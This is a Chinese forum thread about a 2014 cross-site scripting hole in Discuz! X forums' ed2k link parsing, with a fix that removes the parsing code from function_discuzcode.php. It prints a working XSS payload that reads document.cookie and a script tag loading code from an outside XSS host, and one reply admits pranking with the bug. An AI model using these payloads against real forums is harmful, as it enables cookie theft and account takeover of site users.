【独家】关于Discuz X! 通杀XSS的处理办法
本帖最后由 Antergone 于 2014-3-3 00:12 编辑首先来个这段代码
ed2k://|file|test|'+alert(document.cookie)+'|test/
这是一段电驴的连接。
先说明一下这个XSS是不能进行钓鱼。在这里说一下原理
我们的基础认证钓鱼肯定是这样的
<script src=http://xss.re/0001></script>
ed2k的连接识别是这样的,从ed2k://开始到下一“/" 在上述的基础认证钓鱼的代码里面肯定是行不通的只能识别到http:
所以说现在就要解决弹出cookies的问题了
既然是ed2k惹的祸,我看很多论坛是给他加了参数。我这里有一个简单办法。
很多会员共享的东西里面还是有用到电驴链接的,我们不能直接把他当做关键词屏蔽了。所以直接让ed2k不解析。让这个连接成为文本。
查了下,discuz从X系列开始就可以ed2k自动解析
修改文件你论坛根目录下source\function\function_discuzcode.php
找到
if($allowbbcode)
{
if(strpos($msglower, 'ed2k://') !== FALSE)
{
$message = preg_replace("/ed2k:\/\/(.+?)\//e", "parseed2k('\\1')", $message);
}
}
删除了。
然后
**** Hidden Message *****
然后呢/? 本帖隐藏的内容
保存上传覆盖后更新缓存即可 新漏洞?还是? 风雨 发表于 2014-3-3 00:35 static/image/common/back.gif
新漏洞?还是?
这两天的 诶呦 X的爽吧 哈哈昨天我就恶作剧了 看看解决办法 刚刚测试了下这个Xss,发现也不怎么好用的